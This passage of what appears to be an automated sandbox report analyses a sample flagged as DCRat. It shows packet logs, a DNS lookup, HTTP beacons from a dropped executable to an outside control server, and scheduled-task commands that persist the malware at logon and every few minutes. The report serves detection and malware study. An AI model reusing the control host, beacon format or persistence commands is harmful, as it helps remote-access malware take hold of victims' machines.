                            Aug 6, 2022 00:53:01.444194078 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444231987 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444264889 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.444271088 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444309950 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444335938 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.444348097 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444386959 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444406033 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.444423914 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.444483042 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.507935047 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508009911 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508061886 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508080959 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.508111954 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508164883 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.508172989 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508227110 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508280039 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.508284092 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508335114 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508387089 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.508388996 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508440971 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508490086 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508549929 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508568048 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.508621931 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.508625984 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508691072 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508728027 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508766890 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508797884 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508827925 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508856058 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.508893967 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.509000063 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.572487116 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572546959 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572592974 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572626114 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.572633028 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572673082 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572688103 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.572711945 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572750092 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572757959 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.572788954 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572825909 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572829962 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.572864056 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572901011 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572912931 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.572941065 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572981119 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.572988987 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.584369898 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.648134947 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648192883 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648232937 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648250103 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.648484945 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648544073 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648547888 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.648597002 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648710966 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648714066 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.648766994 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648821115 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648825884 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.648874998 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.648933887 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.648935080 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649000883 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649059057 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649090052 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.649099112 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649137020 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649153948 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.649195910 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649241924 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649257898 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.649283886 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649319887 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649344921 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.649362087 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649401903 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649427891 CEST4977980192.168.2.3141.8.195.65
                            Aug 6, 2022 00:53:01.649441004 CEST8049779141.8.195.65192.168.2.3
                            Aug 6, 2022 00:53:01.649482012 CEST8049779141.8.195.65192.168.2.3
                            TimestampSource PortDest PortSource IPDest IP
                            Aug 6, 2022 00:53:01.227482080 CEST5898153192.168.2.38.8.8.8
                            Aug 6, 2022 00:53:01.245068073 CEST53589818.8.8.8192.168.2.3
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Aug 6, 2022 00:53:01.227482080 CEST192.168.2.38.8.8.80x8e7Standard query (0)a0702220.xsph.ruA (IP address)IN (0x0001)
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Aug 6, 2022 00:53:01.245068073 CEST8.8.8.8192.168.2.30x8e7No error (0)a0702220.xsph.ru141.8.195.65A (IP address)IN (0x0001)
                            • a0702220.xsph.ru
                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.349779141.8.195.6580C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
                            TimestampkBytes transferredDirectionData
                            Aug 6, 2022 00:53:01.378452063 CEST1636OUTGET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1
                            Accept: */*
                            Content-Type: text/csv
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                            Host: a0702220.xsph.ru
                            Connection: Keep-Alive
                            Aug 6, 2022 00:53:01.444070101 CEST1676INHTTP/1.1 403 Forbidden
                            Server: openresty
                            Date: Fri, 05 Aug 2022 22:53:01 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Vary: Accept-Encoding
                            Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74
                            Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height
                            Aug 6, 2022 00:53:01.584369898 CEST1737OUTGET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1
                            Accept: */*
                            Content-Type: text/csv
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                            Host: a0702220.xsph.ru
                            Aug 6, 2022 00:53:01.648134947 CEST1738INHTTP/1.1 403 Forbidden
                            Server: openresty
                            Date: Fri, 05 Aug 2022 22:53:01 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Vary: Accept-Encoding
                            Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74
                            Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height


                            Click to jump to process

                            Target ID:0
                            Start time:00:52:03
                            Start date:06/08/2022
                            Path:C:\Users\user\Desktop\cDouNOFXle.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\cDouNOFXle.exe"
                            Imagebase:0x60000
                            File size:1232540 bytes
                            MD5 hash:54172888B473F2515B13FE1E2032A112
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:1
                            Start time:00:52:05
                            Start date:06/08/2022
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"
                            Imagebase:0x380000
                            File size:147456 bytes
                            MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:4
                            Start time:00:52:08
                            Start date:06/08/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
                            Imagebase:0xc20000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:5
                            Start time:00:52:08
                            Start date:06/08/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c9170000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:6
                            Start time:00:52:08
                            Start date:06/08/2022
                            Path:C:\comproviderRuntimecommon\chainsavesref.exe
                            Wow64 process (32bit):false
                            Commandline:C:\comproviderRuntimecommon\chainsavesref.exe
                            Imagebase:0x350000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 70%, ReversingLabs
                            Reputation:low

                            Target ID:8
                            Start time:00:52:14
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:9
                            Start time:00:52:14
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73c930000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:10
                            Start time:00:52:15
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:11
                            Start time:00:52:16
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:12
                            Start time:00:52:16
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:14
                            Start time:00:52:16
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 11 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:16
                            Start time:00:52:17
                            Start date:06/08/2022
                            Path:C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
                            Wow64 process (32bit):false
